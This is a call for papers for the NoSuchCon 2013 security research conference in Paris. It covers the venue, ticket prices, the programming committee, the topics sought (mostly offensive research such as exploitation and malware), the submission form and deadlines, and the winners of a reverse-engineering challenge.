conference. It's tougher than one might expect, but with the help of many (see in particular the support from our hardcore Programming Committee of death), we are confident that passion will prevail and that we'll eventually learn something from each other :) If you're tired of people making money on your back by monetizing your research whenever you go to a conference, we have good news: we're 100% non-profit. We're also not affiliated with any .gov or .com or any other organization. We work hard at night. Our aim is to learn stuff. If this sounds a lot like your own life, we'd be happy to have you among us. It's also worth remembering that hacking is *not* a competition. As such, there is no winner or rockstar. All you'll find here is people experimenting and seeking truth in code and RFCs. Finally, we'd like to insist on respect. Respect among attendees of course, which goes without saying (we all share the same passion; let's not get into ego problems and instead let's learn from each other. You know deep inside yourself that even though *you* certainly did your part of hard work, there would be no computers or network without the help of many), but also for researchers who come over, often from very far away, to present months of late night work to their peers. This is why NSC is strictly single track: every talk that makes it in deserves to be attended to, and everyone deserves to be treated with equal esteem and respect. There's no such thing as a rockstar at NSC: if you're after fame and profit, we're sure you'll find many other places to go to these days. --[ Press people / Media / Media Analysts / Bloggers: NSC is not a top secret conference. You are welcome to come over and participate. NSC staff will do their best to make your job easier. Please, bear in mind that you'll have to comply with strict hacker ethics, particularly in terms of privacy, personality rights and respect the anonymity of people who do not want to appear in your publications: you cannot take pictures of people without their *prior* consent, and people do not *have to* answer to any question if they don't feel like it. --[ Venue: The NSC conference will be hosted in the French Communist Party's amazing headquarters. This astonishing building was designed by the recently deceased Brazilian architect Oscar Niemeyer. The address is: Espace Oscar Niemeyer - Siege du Parti Communiste 2 Place Colonel Fabien, 75019 Paris, France --[ Tickets/Pricing: Tickets will be available for sales within days via our main website. l33t sponsor ticket 1337 EUR Evil sponsor ticket 666 EUR Regular on-site ticket 300 EUR Regular online ticket 250 EUR Early bird ticket 2 200 EUR before 2013/04/30 Early bird ticket 150 EUR before 2013/04/01 Student ticket 50 EUR (50 tickets available) --[ Quality: The aim of NSC is best summarized in 3 words: quality, quality and research. That, and hard work ! We believe that there is a place for quality independent security research disclosure. We think that this place should be run on a non-profit basis. We do our best to ensure that the chosen talks are of the upmost quality thanks to the highly respected security researchers who form our selection panel. As a result, we hope to deliver in a 3 days single track conference some seriously disruptive food for thoughts to security enthusiasts. Whether you will like a given talk or not depends on several factors involving your personal interests... and your general appetite for security ;) That being said, we totally think that every talk selected for NSC deserves the attention of the entire audience. We therefore do stick to a single track format. That's a kind of respect for speakers. As a speaker, it doesn't mean you have to lower the bar of your talk. It's rather the opposite, this is intended to cut down the number of "fillers"; not-so-sexy-talks. We actually encourage highly technical talks and writing code is somewhat compulsory (...unless you are better at solder ironing and have an electronic solver !). Don't assume ridiculous prerequisites, but assume people grasp new concepts quickly (isn't that what hacking is all about really?). --[ Disclosure policy: We consider researchers as outstanding grown adults. We therefore impose them the following disclosure policy: DO WHAT YOU WANT. --[ Programming Committee: The programming committee plays a central role in ensuring the best talks make it to the conference. We are very humbled to have such a great team of cool and remarkable engineers giving a bit of their free time to help us build a decent conference: Alex Ionescu (CrowdStrike) @aionescu Andrewg (felinemenace) Ange Albertini (Corkami) @angealbertini Nemo (felinemenace) Daniel Hodson (felinemenace/Ruxcon) Aaron Portnoy (Exodus Intelligence) @aaronportnoy Piotr Bania @PiotrBania Bannedit (Corelan) @bannedit0 Carlos Sarraute (Grandata) Cesar Cerrudo (IOActive) @cesarcer Dhillon Kannabhiran (HackInTheBox) @hackinthebox Nico Waisman (Immunity) @nicowaisman Federico Kirschbaum (Ekoparty) @fede_k FX (Phenoelit) @41414141 Fyodor Yarochkin (Academia Sinica/Plurk) @fygrave Hugo Fortier (RECon) @hugofortier Itzik Kotler @itzikkotler Jason Martin (Shakacon) @shakacon joernchen (Phenoelit) @joernchen Jonathan Brossard (Toucan System) @endrazine Julio Auto (iSIGHT Partners) @julioauto Tarjei Mandt (Azimuth) @kernelpool Laurent Gaffie (Spiderlabs) @laurentgaffie Lurene Grenier (Immunity) @pusscat Matthieu Suiche @msuiche Nicolas Ruff (EADS Innovation Works) @newsoft Pipacs (Linux Kernel Page Exec Protection) corelanc0d3r @corelanc0d3r Ravishankar Borgaonkar (Berlin University) @raviborgaonkar Rodrigo Branco "BSDaemon" (Cipher) @bsdaemon Sergey Bratus (Dartmouth College) @sergeybratus Silvio Cesare (Deakin University) @silviocesare The Grugq (Coseinc) @thegrugq Tim Kornau (Google) Travis Goodspeed @travisgoodspeed Note: thanks heaps, we owe you dear PC members :) --[ Submitting: We are interested in world domination 2013. We are glad you are willing to contribute. We highly encourage and will favour presentations with demos. To assess the depth, novelty and relevance of submitted talks, we will require a 2 to 3 pages whitepaper (as an order of magnitude...) along with your submission. We know it's a lot of work for speakers, but we'll help you get to Paris: it's not too bad a deal ;) We are only accepting submissions in English. The standard format will be of 35 mins presentation + 10 mins Q&A. If you think your talk deserves more time, feel free to ask for two slots (that is extended talk: 80min + 10mins Q&A). Please note that any talk whose content will be judged commercial or non vendor neutral will be rejected and/or interrupted on stage. General topics of interest are mostly offensive and include: - Security problems that are not fixable, - finding vulnerabilities and/or proving security properties of software, - new exploitation techniques (new classes of bugs, heap overflows on different memory allocators, win8...), proving things on binaries, - bytecode vulnerability discovery and exploitation (java, .NET, python...), - reverse engineering, writing debuggers, - exploit automation (targeted/worms), - malware engineering, - security assessment of new network protocols, - hardware hacking (raspberry based automated network hacking ?), - routers hacking, - crypto: practical assessment of software, quantum computers, FPGA and hardware implementations, - BYOD for dummies: ARM/x86 android/IOS hacking, persistence, remote control... - Botnets, Exploit kits and how to use them for targeted attacks, - Anti forensics: Piercing network firewalls and proxies, persistence,automated network ripping, data exfiltration, hiding your data from the CIA, - owning corporate and government networks for ever, - defeating new security protections, - breaking out of hypervizors, - hardware level vulnerabilities (cpu bugs?), - Hacking UEFI & Secure Boot (Bootkitting UEFI, Bitlocker...), - GNU Radio/SDR/anykindofwireless hacking, Signal Processing, - Hacking web application frameworks (java, ruby, php, .NET,...), - Be god on the internet, walk on water, - break stuff. We highly encourage any hardcore technical topics not listed in the above!! Submit your presentation and materials and the below form via e-mail to email@example.com -----8X---------------8X-----------8X---------------- [ CFP ANSWER TEMPLATE ] *** General information: * Speakers name or alias * Demo [Y/N] * Number of lines of code written during your project? * I need help with visas [Y/N] * Presentation Title * Abstract * Biography * E-mail address * Address * Phone number * Company (name) or Independent? * additional requirements: Internet? Others? *** Talk Format: Please chose your talk format: [ ] Standard (30min+10min Q&A) or: [ ] Extended (80min+10min Q&A) *** Attachments: Specify if your submission contains any of the following information: * Tool [Y/N] * Slides [Y/N] Please attach your whitepaper to your submission in one of the following formats: raw ASCII 7bits text, TeX file, PDF file, MS office or Open Office document or presentation. (No other formats will be accepted: target your 0days ;)). -----8X---------------8X-----------8X---------------- --[ Deadlines: The CFP closes on March the 31st, 2013. The earlier you submit, the better for all of us ;) You shall be notified of your acceptance as a speaker by the 15th of April, 2013. --[ Do I want to talk there anyway? It's up to you mate. If you like the things we like, you may as well like the conference. You may want to have a look at the 3 previous editions of HES we co-organized and see if it looks like something of interest to you. We absolutely do encourage you to submit if you have something interesting to say. In particular, academic researchers, hobbyists, or just regular security enthusiasts of any age and from all over the internet are welcome to submit. --[ Speaker benefits: 4 nights accommodation in Paris, Travel reimbursement (up to $1000), Much respect and love. --[ More information: Web site: http://www.nosuchcon.org/ Twitter: @NoSuchCon Facebook: https://www.facebook.com/NoSuchCon CFP information/submissions: firstname.lastname@example.org --[ Greetings: The No Such Association (NSA) team would like to thank the security research community for its continuous support. We would like to thank in particular members of the Programming Committee, the past speakers, all of the volonteers as well as all the attendees and the past sponsors, plus the countless friends, that share our passion and are ready to share some of their time with us :) --[ EOF ]--
Winners Oppida-NSC challenge!
Florent Marceau - 23 avril - 10:05 - Hack In The Box Amsterdam 2014 (www.hitb.org) pass + hotel + flight!
Fabien Perigaud - 24 avril - 11:28
Jurriaan "skier" Bremer - 25 avril - 15:51
Pierre "peio" Petit - 28 avril - 18:43
X-N2O - 5 Mai - 11:25 - Samsung Galaxy Tab 2 16GB
Outside the competition (after the deadline)
Axel "0vercl0k" Souchet - 26 mai - http://0vercl0k.tuxfamily.org/bl0g/?p=253
kutio - 30 mai - http://kutioo.blogspot.fr/2013/05/nosuchcon-2013-challenge-write-up-and.html
All winners have also had a USB missile launches:
The Wargame @NSC2013!
North Korea has launched a cyber operations training facility.
Your job, as one of the trainees, is to impress the facility's staff with your skills by capturing as many points as possible.
The facility has several servers which you can reach by first logging in with SSH on kishi.
More info will be on the kishi website at: http://kishi.labs.overthewire.org/
This website will only be accessible from the conference for now.
The first edition of the Oppida-NSC challenge @NSC2013!
The challenge is available here (password: Oppida_NSC_Challenge), and end on the 16th of May at 00:00 GMT+1. It will consist of a Windows application (32 bits) that you will be able to download as soon as the challenge starts.
You will need to find a valid name/serial combination and send it to challenge2013 (at) oppida.fr as soon as possible!
Details of your analysis must be provided within one week after the solution.
The "supr3me 31337" winner will be the first to provide a solution (still requires to provide a detailled analysis).
The next 10 solutions received after the first one will participate in a /dev/urandom draw.
"Supr3me 31337" prize:
An Hack In The Box Amsterdam 2014 (www.hitb.org) pass + hotel + flight! (1)
HITB is one of the most respected security conference in Europe, Oppida is inviting you to this wonderful event next year!
A job offer as the next North Korea supreme leader! (2)
The following people are not allowed to participate: the NSC staff, Oppida employees, Justin Bieber, Lady Gaga.
By participating to the challenge you agree that your name, solution, and detailed analysis may be published on any media the NSC committee deems appropriate.
Winners will need to provide a valid ID/passport in order to receive their gift.
Both English and French are OK for solutions and analysis details.
The challenge is not open to teams, only individuals are allowed to apply.
The full contest rules are available here
(1) Maximal total value: 2400€ VAT included.
(2) Could be replaced by a Samsung Galaxy Tab 2 16GB if the position is not available (yet).
This year's challenge is provided by Oppida